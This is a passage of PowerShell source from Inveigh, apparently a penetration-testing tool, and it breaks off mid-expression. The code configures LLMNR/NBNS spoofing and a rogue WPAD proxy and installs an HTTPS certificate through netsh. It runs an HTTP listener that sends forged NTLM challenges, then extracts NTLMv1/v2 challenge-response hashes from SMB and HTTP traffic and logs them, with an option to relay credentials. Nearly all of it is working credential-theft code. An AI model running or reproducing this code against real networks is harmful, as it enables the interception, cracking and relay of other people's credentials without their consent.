$null\n$inveigh.status_queue.Add(\"LLMNR/NBNS Spoofer IP Address = $SpooferIP\")  > $null\n\nif($LLMNR -eq 'Y')\n{\n    $inveigh.status_queue.Add(\"LLMNR Spoofing Enabled\")  > $null\n    $inveigh.status_queue.Add(\"LLMNR TTL = $LLMNRTTL Seconds\")  > $null\n    $LLMNR_response_message = \"- spoofed response has been sent\"\n}\nelse\n{\n    $inveigh.status_queue.Add(\"LLMNR Spoofing Disabled\")  > $null\n    $LLMNR_response_message = \"- LLMNR spoofing is disabled\"\n}\n\nif($NBNS -eq 'Y')\n{\n    $NBNSTypes_output = $NBNSTypes -join \",\"\n    \n    if($NBNSTypes.Count -eq 1)\n    {\n        $inveigh.status_queue.Add(\"NBNS Spoofing Of Type $NBNSTypes_output Enabled\")  > $null\n    }\n    else\n    {\n        $inveigh.status_queue.Add(\"NBNS Spoofing Of Types $NBNSTypes_output Enabled\")  > $null\n    }\n\n    $inveigh.status_queue.Add(\"NBNS TTL = $NBNSTTL Seconds\")  > $null\n    $NBNS_response_message = \"- spoofed response has been sent\"\n}\nelse\n{\n    $inveigh.status_queue.Add(\"NBNS Spoofing Disabled\")  > $null\n    $NBNS_response_message = \"- NBNS spoofing is disabled\"\n}\n\nif($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))\n{\n    $inveigh.status_queue.Add(\"Spoofing requests for \" + $SpooferHostsReply -join \",\")  > $null\n}\n\nif($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))\n{\n    $inveigh.status_queue.Add(\"Ignoring requests for \" + $SpooferHostsIgnore -join \",\")  > $null\n}\n\nif($SpooferIPsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))\n{\n    $inveigh.status_queue.Add(\"Spoofing requests from \" + $SpooferIPsReply -join \",\")  > $null\n}\n\nif($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))\n{\n    $inveigh.status_queue.Add(\"Ignoring requests from \" + $SpooferIPsIgnore -join \",\")  > $null\n}\n\nif($SpooferRepeat -eq 'N')\n{\n    $inveigh.spoofer_repeat = $false\n    $inveigh.status_queue.Add(\"Spoofer Repeating Disabled\")  > $null\n}\nelse\n{\n    $inveigh.spoofer_repeat = $true\n}\n\nif($SMB -eq 'Y')\n{\n    $inveigh.status_queue.Add(\"SMB Capture Enabled\")  > $null\n}\nelse\n{\n    $inveigh.status_queue.Add(\"SMB Capture Disabled\")  > $null\n}\n\nif($HTTP -eq 'Y')\n{\n    $inveigh.HTTP = $true\n    $inveigh.status_queue.Add(\"HTTP Capture Enabled\")  > $null\n}\nelse\n{\n    $inveigh.HTTP = $false\n    $inveigh.status_queue.Add(\"HTTP Capture Disabled\")  > $null\n}\n\nif($HTTPS -eq 'Y')\n{\n\n    try\n    {\n        $inveigh.HTTPS = $true\n        $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store(\"My\",\"LocalMachine\")\n        $certificate_store.Open('ReadWrite')\n        $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2\n        $certificate.Import($PWD.Path + \"\\Inveigh.pfx\")\n        $certificate_store.Add($certificate) \n        $certificate_store.Close()\n        $netsh_certhash = \"certhash=\" + $inveigh.certificate_thumbprint\n        $netsh_app_ID = \"appid={\" + $inveigh.certificate_application_ID + \"}\"\n        $netsh_arguments = @(\"http\",\"add\",\"sslcert\",\"ipport=0.0.0.0:443\",$netsh_certhash,$netsh_app_ID)\n        & \"netsh\" $netsh_arguments > $null\n        $inveigh.status_queue.Add(\"HTTPS Capture Enabled\")  > $null\n    }\n    catch\n    {\n        $certificate_store.Close()\n        $HTTPS=\"N\"\n        $inveigh.HTTPS = $false\n        $inveigh.status_queue.Add(\"HTTPS Capture Disabled Due To Certificate Install Error\")  > $null\n    }\n\n}\nelse\n{\n    $inveigh.status_queue.Add(\"HTTPS Capture Disabled\")  > $null\n}\n\nif($inveigh.HTTP -or $inveigh.HTTPS)\n{\n    $inveigh.status_queue.Add(\"HTTP/HTTPS Authentication = $HTTPAuth\")  > $null\n    $inveigh.status_queue.Add(\"WPAD Authentication = $WPADAuth\")  > $null\n\n    if($HTTPDir -and !$HTTPResponse)\n    {\n        $inveigh.status_queue.Add(\"HTTP/HTTPS Directory = $HTTPDir\")  > $null\n\n        if($HTTPDefaultFile)\n        {\n            $inveigh.status_queue.Add(\"HTTP/HTTPS Default Response File = $HTTPDefaultFile\")  > $null\n        }\n\n        if($HTTPDefaultEXE)\n        {\n            $inveigh.status_queue.Add(\"HTTP/HTTPS Default Response Executable = $HTTPDefaultEXE\")  > $null\n        }\n\n    }\n\n    if($HTTPResponse)\n    {\n        $inveigh.status_queue.Add(\"HTTP/HTTPS Custom Response Enabled\")  > $null\n    }\n\n    if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic')\n    {\n        $inveigh.status_queue.Add(\"Basic Authentication Realm = $HTTPBasicRealm\")  > $null\n    }\n\n    if($WPADIP -and $WPADPort)\n    {\n        $inveigh.status_queue.Add(\"WPAD Response Enabled\")  > $null\n        $inveigh.status_queue.Add(\"WPAD = $WPADIP`:$WPADPort\")  > $null\n\n        if($WPADDirectHosts)\n        {\n            ForEach($WPAD_direct_host in $WPADDirectHosts)\n            {\n                $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, \"' + $WPAD_direct_host + '\")) return \"DIRECT\";'\n            }\n\n            $inveigh.WPAD_response = \"function FindProxyForURL(url,host){\" + $WPAD_direct_hosts_function + \"return `\"PROXY \" + $WPADIP + \":\" + $WPADPort + \"`\";}\"\n            $inveigh.status_queue.Add(\"WPAD Direct Hosts = \" + $WPADDirectHosts -join \",\")  > $null\n        }\n        else\n        {\n            $inveigh.WPAD_response = \"function FindProxyForURL(url,host){return `\"PROXY \" + $WPADIP + \":\" + $WPADPort + \"`\";}\"\n        }\n\n    }\n    elseif($WPADResponse -and !$WPADIP -and !$WPADPort)\n    {\n        $inveigh.status_queue.Add(\"WPAD Custom Response Enabled\")  > $null\n        $inveigh.WPAD_response = $WPADResponse\n    }\n    else\n    {\n        if($WPADEmptyFile -eq 'Y')\n        {\n            $inveigh.status_queue.Add(\"WPAD Default Response Enabled\")  > $null\n            $inveigh.WPAD_response = \"function FindProxyForURL(url,host){return `\"DIRECT`\";}\"\n        }\n    }\n\n    if($Challenge)\n    {\n        $inveigh.status_queue.Add(\"NTLM Challenge = $Challenge\")  > $null\n    }\n\n}\n\nif($MachineAccounts -eq 'N')\n{\n    $inveigh.status_queue.Add(\"Ignoring Machine Accounts\")  > $null\n    $inveigh.machine_accounts = $false\n}\nelse\n{\n    $inveigh.machine_accounts = $true\n}\n\nif($ConsoleOutput -eq 'Y')\n{\n    $inveigh.status_queue.Add(\"Real Time Console Output Enabled\")  > $null\n    $inveigh.console_output = $true\n\n    if($ConsoleStatus -eq 1)\n    {\n        $inveigh.status_queue.Add(\"Console Status = $ConsoleStatus Minute\")  > $null\n    }\n    elseif($ConsoleStatus -gt 1)\n    {\n        $inveigh.status_queue.Add(\"Console Status = $ConsoleStatus Minutes\")  > $null\n    }\n\n}\nelse\n{\n\n    if($inveigh.tool -eq 1)\n    {\n        $inveigh.status_queue.Add(\"Real Time Console Output Disabled Due To External Tool Selection\")  > $null\n    }\n    else\n    {\n        $inveigh.status_queue.Add(\"Real Time Console Output Disabled\")  > $null\n    }\n\n}\n\nif($ConsoleUnique -eq 'Y')\n{\n    $inveigh.console_unique = $true\n}\nelse\n{\n    $inveigh.console_unique = $false\n}\n\nif($FileOutput -eq 'Y')\n{\n    $inveigh.status_queue.Add(\"Real Time File Output Enabled\")  > $null\n    $inveigh.status_queue.Add(\"Output Directory = $output_directory\")  > $null\n    $inveigh.file_output = $true\n}\nelse\n{\n    $inveigh.status_queue.Add(\"Real Time File Output Disabled\")  > $null\n}\n\nif($FileUnique -eq 'Y')\n{\n    $inveigh.file_unique = $true\n}\nelse\n{\n    $inveigh.file_unique = $false\n}\n\nif($RunTime -eq 1)\n{\n    $inveigh.status_queue.Add(\"Run Time = $RunTime Minute\")  > $null\n}\nelseif($RunTime -gt 1)\n{\n    $inveigh.status_queue.Add(\"Run Time = $RunTime Minutes\")  > $null\n}\n\nif($SMBRelay -eq 'N')\n{\n\n    if($ShowHelp -eq 'Y')\n    {\n        $inveigh.status_queue.Add(\"Use Get-Command -Noun Inveigh* to show available functions\")  > $null\n        $inveigh.status_queue.Add(\"Run Stop-Inveigh to stop Inveigh\")  > $null\n        \n        if($inveigh.console_output)\n        {\n            $inveigh.status_queue.Add(\"Press any key to stop real time console output\")  > $null\n        }\n\n    }\n\n    if($inveigh.status_output)\n    {\n\n        while($inveigh.status_queue.Count -gt 0)\n        {\n\n            if($inveigh.output_stream_only)\n            {\n                Write-Output($inveigh.status_queue[0] + $inveigh.newline)\n                $inveigh.status_queue.RemoveRange(0,1)\n            }\n            else\n            {\n\n                switch ($inveigh.status_queue[0])\n                {\n\n                    \"Run Stop-Inveigh to stop Inveigh\"\n                    {\n                        Write-Warning($inveigh.status_queue[0])\n                        $inveigh.status_queue.RemoveRange(0,1)\n                    }\n\n                    default\n                    {\n                        Write-Output($inveigh.status_queue[0])\n                        $inveigh.status_queue.RemoveRange(0,1)\n                    }\n\n                }\n\n            }\n\n        }\n\n    }\n}\nelse\n{\n    try\n    {\n        Invoke-InveighRelay -HTTP $HTTP -HTTPS $HTTPS -HTTPSCertAppID $HTTPSCertAppID -HTTPSCertThumbprint $HTTPSCertThumbprint -WPADAuth $WPADAuth -SMBRelayTarget $SMBRelayTarget -SMBRelayUsernames $SMBRelayUsernames -SMBRelayAutoDisable $SMBRelayAutoDisable -SMBRelayNetworkTimeout $SMBRelayNetworkTimeout -SMBRelayCommand $SMBRelayCommand -Tool $Tool -ShowHelp $ShowHelp \n    }\n    catch\n    {\n        $inveigh.running = $false        \n        throw \"Invoke-InveighRelay is not loaded\"\n    }\n}\n\n# Begin ScriptBlocks\n\n# Shared Basic Functions ScriptBlock\n$shared_basic_functions_scriptblock =\n{\n    function DataToUInt16($field)\n    {\n\t   [Array]::Reverse($field)\n\t   return [System.BitConverter]::ToUInt16($field,0)\n    }\n\n    function DataToUInt32($field)\n    {\n\t   [Array]::Reverse($field)\n\t   return [System.BitConverter]::ToUInt32($field,0)\n    }\n\n    function DataLength\n    {\n        param ([Int]$length_start,[Byte[]]$string_extract_data)\n\n        $string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start + 1)],0)\n        return $string_length\n    }\n\n    function DataToString\n    {\n        param ([Int]$string_length,[Int]$string2_length,[Int]$string3_length,[Int]$string_start,[Byte[]]$string_extract_data)\n\n        $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length - 1)])\n        $string_data = $string_data -replace \"-00\",\"\"\n        $string_data = $string_data.Split(\"-\") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}\n        $string_extract = New-Object System.String ($string_data,0,$string_data.Length)\n        return $string_extract\n    }\n}\n\n# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response\n$SMB_NTLM_functions_scriptblock =\n{\n\n    function SMBNTLMChallenge\n    {\n        param ([Byte[]]$payload_bytes)\n\n        $payload = [System.BitConverter]::ToString($payload_bytes)\n        $payload = $payload -replace \"-\",\"\"\n        $NTLM_index = $payload.IndexOf(\"4E544C4D53535000\")\n\n        if($payload.SubString(($NTLM_index + 16),8) -eq \"02000000\")\n        {\n            $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16)\n        }\n\n        return $NTLM_challenge\n    }\n\n    function SMBNTLMResponse\n    {\n        param ([Byte[]]$payload_bytes)\n\n        $payload = [System.BitConverter]::ToString($payload_bytes)\n        $payload = $payload -replace \"-\",\"\"\n        $NTLM_index = $payload.IndexOf(\"4E544C4D53535000\")\n        $NTLM_bytes_index = $NTLM_index / 2\n\n        if($payload.SubString(($NTLM_index + 16),8) -eq \"03000000\")\n        {\n            $LM_length = DataLength ($NTLM_bytes_index + 12) $payload_bytes\n            $LM_offset = $payload_bytes[($NTLM_bytes_index + 16)]\n\n            if($LM_length -ge 24)\n            {\n                $NTLM_length = DataLength ($NTLM_bytes_index + 20) $payload_bytes\n                $NTLM_offset = $payload_bytes[($NTLM_bytes_index + 24)]\n                $NTLM_domain_length = DataLength ($NTLM_bytes_index + 28) $payload_bytes\n                $NTLM_domain_offset = DataLength ($NTLM_bytes_index + 32) $payload_bytes\n                $NTLM_domain_string = DataToString $NTLM_domain_length 0 0 ($NTLM_bytes_index + $NTLM_domain_offset) $payload_bytes\n                $NTLM_user_length = DataLength ($NTLM_bytes_index + 36) $payload_bytes\n                $NTLM_user_string = DataToString $NTLM_user_length $NTLM_domain_length 0 ($NTLM_bytes_index + $NTLM_domain_offset) $payload_bytes\n                $NTLM_host_length = DataLength ($NTLM_bytes_index + 44) $payload_bytes\n                $NTLM_host_string = DataToString $NTLM_host_length $NTLM_user_length $NTLM_domain_length ($NTLM_bytes_index + $NTLM_domain_offset) $payload_bytes\n\n                if(([System.BitConverter]::ToString($payload_bytes[($NTLM_bytes_index + $LM_offset)..($NTLM_bytes_index + $LM_offset + $LM_length - 1)]) -replace \"-\",\"\") -eq (\"00\" * $LM_length))\n                {\n                    $NTLMv2_response = [System.BitConverter]::ToString($payload_bytes[($NTLM_bytes_index + $NTLM_offset)..($NTLM_bytes_index + $NTLM_offset + $NTLM_length - 1)]) -replace \"-\",\"\"\n                    $NTLMv2_response = $NTLMv2_response.Insert(32,':')\n                    $NTLMv2_hash = $NTLM_user_string + \"::\" + $NTLM_domain_string + \":\" + $NTLM_challenge + \":\" + $NTLMv2_response       \n\n                    if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$'))))\n                    {      \n                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add(\"$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\\$NTLM_user_string captured from $source_IP($NTLM_host_string)\")])   \n                        $inveigh.NTLMv2_list.Add($NTLMv2_hash)\n\n                        if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains \"$source_IP $NTLM_domain_string\\$NTLM_user_string\"))\n                        {\n                            $inveigh.console_queue.Add(\"$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv2_hash\")\n                        }\n                        else\n                        {\n                            $inveigh.console_queue.Add(\"$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string) for $NTLM_domain_string\\$NTLM_user_string - not unique\")\n                        }\n\n                        if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains \"$source_IP $NTLM_domain_string\\$NTLM_user_string\")))\n                        {\n                            $inveigh.NTLMv2_file_queue.Add($NTLMv2_hash)\n                            $inveigh.console_queue.Add(\"SMB NTLMv2 challenge/response written to \" + $inveigh.NTLMv2_out_file)\n                        }\n\n                        if($inveigh.NTLMv2_username_list -notcontains \"$source_IP $NTLM_domain_string\\$NTLM_user_string\")\n                        {\n                            $inveigh.NTLMv2_username_list.Add(\"$source_IP $NTLM_domain_string\\$NTLM_user_string\")\n                        }\n\n                    }\n\n                }\n                else\n                {\n                    $NTLMv1_response = [System.BitConverter]::ToString($payload_bytes[($NTLM_bytes_index + $LM_offset)..($NTLM_bytes_index + $LM_offset + $NTLM_length + $LM_length - 1)]) -replace \"-\",\"\"\n                    $NTLMv1_response = $NTLMv1_response.Insert(48,':')\n                    $NTLMv1_hash = $NTLM_user_string + \"::\" + $NTLM_domain_string + \":\" + $NTLMv1_response + \":\" + $NTLM_challenge\n\n                    if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$'))))\n                    {    \n                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add(\"$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\\$NTLM_user_string captured from $source_IP($NTLM_host_string)\")])\n                        $inveigh.NTLMv1_list.Add($NTLMv1_hash)\n\n                        if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains \"$source_IP $NTLM_domain_string\\$NTLM_user_string\"))\n                        {\n                            $inveigh.console_queue.Add(\"$(Get-Date -format 's') SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv1_hash\")\n                        }\n                        else\n                        {\n                            $inveigh.console_queue.Add(\"$(Get-Date -format 's') - SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string) for $NTLM_domain_string\\$NTLM_user_string - not unique\")\n                        }\n\n                        if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains \"$source_IP $NTLM_domain_string\\$NTLM_user_string\")))\n                        {\n                            $inveigh.NTLMv1_file_queue.Add($NTLMv1_hash)\n                            $inveigh.console_queue.Add(\"SMB NTLMv1 challenge/response written to \" + $inveigh.NTLMv1_out_file)\n                        }\n\n                        if($inveigh.NTLMv1_username_list -notcontains \"$source_IP $NTLM_domain_string\\$NTLM_user_string\")\n                        {\n                            $inveigh.NTLMv1_username_list.Add(\"$source_IP $NTLM_domain_string\\$NTLM_user_string\")\n                        }\n                    \n                    }\n\n                }\n\n                if ($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP)\n                {\n                    $inveigh.IP_capture_list.Add($source_IP.IPAddressToString)\n                }\n\n            }\n\n        }\n\n    }\n\n}\n\n# HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener\n$HTTP_scriptblock = \n{ \n    param ($HTTPAuth,$HTTPBasicRealm,$WPADAuth)\n\n    function NTLMChallengeBase64\n    {\n\n        $HTTP_timestamp = Get-Date\n        $HTTP_timestamp = $HTTP_timestamp.ToFileTime()\n        $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))\n        $HTTP_timestamp = $HTTP_timestamp.Split(\"-\") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}\n\n        if($inveigh.challenge)\n        {\n            $HTTP_challenge = $inveigh.challenge\n            $HTTP_challenge_bytes = $inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')\n            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(\"-\") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}\n        }\n        else\n        {\n            $HTTP_challenge_bytes = [String](1..8 | ForEach-Object {\"{0:X2}\" -f (Get-Random -Minimum 1 -Maximum 255)})\n            $HTTP_challenge = $HTTP_challenge_bytes -replace ' ',''\n            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(\" \") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}\n        }\n\n        $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge)  > $null\n\n        $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,\n                           0x00,0x00,0x00,0x05,0x82,0x89,0xa +\n                           $HTTP_challenge_bytes +\n                           0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,\n                           0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,\n                           0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,\n                           0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,\n                           0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,\n                           0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,\n                           0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,\n                           0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,\n                           0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +\n                           $HTTP_timestamp +\n                           0x00,0x00,0x00,0x00,0x0a,0x0a\n\n        $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)\n        $NTLM = 'NTLM ' + $NTLM_challenge_base64\n        $NTLM_challenge = $HTTP_challenge\n        \n        return $NTLM\n    }\n\n    $HTTP_raw_url_output = $true\n    \n    while($inveigh.running)\n    {\n        $inveigh.context = $inveigh.HTTP_listener.GetContext() \n        $inveigh.request = $inveigh.context.Request\n        $inveigh.response = $inveigh.context.Response\n        $NTLM = 'NTLM'\n        $NTLM_auth = $false\n        $Basic_auth = $false\n        \n        if($inveigh.request.IsSecureConnection)\n        {\n            $HTTP_type = \"HTTPS\"\n        }\n        else\n        {\n            $HTTP_type = \"HTTP\"\n        }\n        \n        if($inveigh.request.RawUrl -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')\n        {\n            $inveigh.response.StatusCode = 200\n        }\n        else\n        {\n            $inveigh.response.StatusCode = 401\n        }\n\n        $HTTP_request_time = Get-Date -format 's'\n\n        if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $inveigh.request.RemoteEndpoint.Address -eq $HTTP_request_remote_endpoint_old)\n        {\n            $HTTP_raw_url_output = $false\n        }\n        else\n        {\n            $HTTP_raw_url_output = $true\n        }\n         \n        if(!$inveigh.request.headers[\"Authorization\"] -and $inveigh.HTTP_listener.IsListening -and $HTTP_raw_url_output)\n        {\n            $inveigh.console_queue.Add(\"$HTTP_request_time - $HTTP_type request for \" + $inveigh.request.RawUrl + \" received from \" + $inveigh.request.RemoteEndpoint.Address)\n            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add(\"$HTTP_request_time - $HTTP_type request for \" + $inveigh.request.RawUrl + \" received from \" + $inveigh.request.RemoteEndpoint.Address)])\n        }\n\n        $HTTP_request_raw_url_old = $inveigh.request.RawUrl\n        $HTTP_request_remote_endpoint_old = $inveigh.request.RemoteEndpoint.Address\n        $HTTP_request_time_old = $HTTP_request_time\n            \n        [String] $authentication_header = $inveigh.request.headers.GetValues('Authorization')\n        \n        if($authentication_header.StartsWith('NTLM '))\n        {\n            $authentication_header = $authentication_header -replace 'NTLM ',''\n            [Byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)\n            $inveigh.response.StatusCode = 401\n            \n            if($HTTP_request_bytes[8] -eq 1)\n            {   \n                $inveigh.response.StatusCode = 401\n                $NTLM = NTLMChallengeBase64\n            }\n            elseif($HTTP_request_bytes[8] -eq 3)\n            {\n                $NTLM = 'NTLM'\n                $HTTP_NTLM_offset = $HTTP_request_bytes[24]\n                $HTTP_NTLM_length = DataLength 22 $HTTP_request_bytes\n                $HTTP_NTLM_domain_length = DataLength 28 $HTTP_request_bytes\n                $HTTP_NTLM_domain_offset = DataLength 32 $HTTP_request_bytes\n                [String] $NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*'\n                $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)\n                $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(\",\")) + 1)\n                       \n                if($HTTP_NTLM_domain_length -eq 0)\n                {\n                    $HTTP_NTLM_domain_string = ''\n                }\n                else\n                {  \n                    $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_length 0 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes\n                } \n                    \n                $HTTP_NTLM_user_length = DataLength 36 $HTTP_request_bytes\n                $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes     \n                $HTTP_NTLM_host_length = DataLength 44 $HTTP_request_bytes\n                $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_length $HTTP_NTLM_domain_length $HTTP_NTLM_user_length $HTTP_NTLM_domain_offset $HTTP_request_bytes\n        \n                if($HTTP_NTLM_length -eq 24) # NTLMv1\n                {\n                    $NTLM_type = \"NTLMv1\"\n                    $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace \"-\",\"\"\n                    $NTLM_response = $NTLM_response.Insert(48,':')\n                    $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + \"::\" + $HTTP_NTLM_domain_string + \":\" + $NTLM_response + \":\" + $NTLM_challenge\n                    \n                    if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))\n                    {    \n                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add(\"$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string captured from \" + $inveigh.request.RemoteEndpoint.Address + \"(\" + $HTTP_NTLM_host_string + \")\")])\n                        $inveigh.NTLMv1_list.Add($inveigh.HTTP_NTLM_hash)\n                        \n                        if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains $inveigh.request.RemoteEndpoint.Address.IPAddressToString + \" $HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string\"))\n                        {\n                            $inveigh.console_queue.Add(\"$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from \" + $inveigh.request.RemoteEndpoint.Address + \"(\" + $HTTP_NTLM_host_string + \"):`n\" + $inveigh.HTTP_NTLM_hash)\n                        }\n                        else\n                        {\n                            $inveigh.console_queue.Add($(Get-Date -format 's') + \" - $HTTP_type NTLMv1 challenge/response captured from \" + $inveigh.request.RemoteEndpoint.Address + \"(\" + $HTTP_NTLM_host_string + \") for $HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string - not unique\")\n                        }\n                        \n                        if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + \" $HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string\"))))\n                        {\n                            $inveigh.NTLMv1_file_queue.Add($inveigh.HTTP_NTLM_hash)\n                            $inveigh.console_queue.Add(\"$HTTP_type NTLMv1 challenge/response written to \" + $inveigh.NTLMv1_out_file)\n                        }\n\n                        if($inveigh.NTLMv1_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + \" $HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string\"))\n                        {\n                            $inveigh.NTLMv1_username_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + \" $HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string\")\n                        }\n\n                    }\n\n                }\n                else # NTLMv2\n                {   \n                    $NTLM_type = \"NTLMv2\"           \n                    $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace \"-\",\"\"\n                    $NTLM_response = $NTLM_response.Insert(32,':')\n                    $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + \"::\" + $HTTP_NTLM_domain_string + \":\" + $NTLM_challenge + \":\" + $NTLM_response\n                    \n                    if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))\n                    {\n                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + \" - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string captured from \" + $inveigh.request.RemoteEndpoint.Address + \"(\" + $HTTP_NTLM_host_string + \")\")])\n                        $inveigh.NTLMv2_list.Add($inveigh.HTTP_NTLM_hash)\n                        \n                        if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + \" $HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string\")))\n                        {\n                            $inveigh.console_queue.Add($(Get-Date -format 's') + \" - $HTTP_type NTLMv2 challenge/response captured from \" + $inveigh.request.RemoteEndpoint.Address + \"(\" + $HTTP_NTLM_host_string + \"):`n\" + $inveigh.HTTP_NTLM_hash)\n                        }\n                        else\n                        {\n                            $inveigh.console_queue.Add($(Get-Date -format 's') + \" - $HTTP_type NTLMv2 challenge/response captured from \" + $inveigh.request.RemoteEndpoint.Address + \"(\" + $HTTP_NTLM_host_string + \") for $HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string - not unique\")\n                        }\n                        \n                        if($inveigh.file_output -and (!$inveigh.file_unique 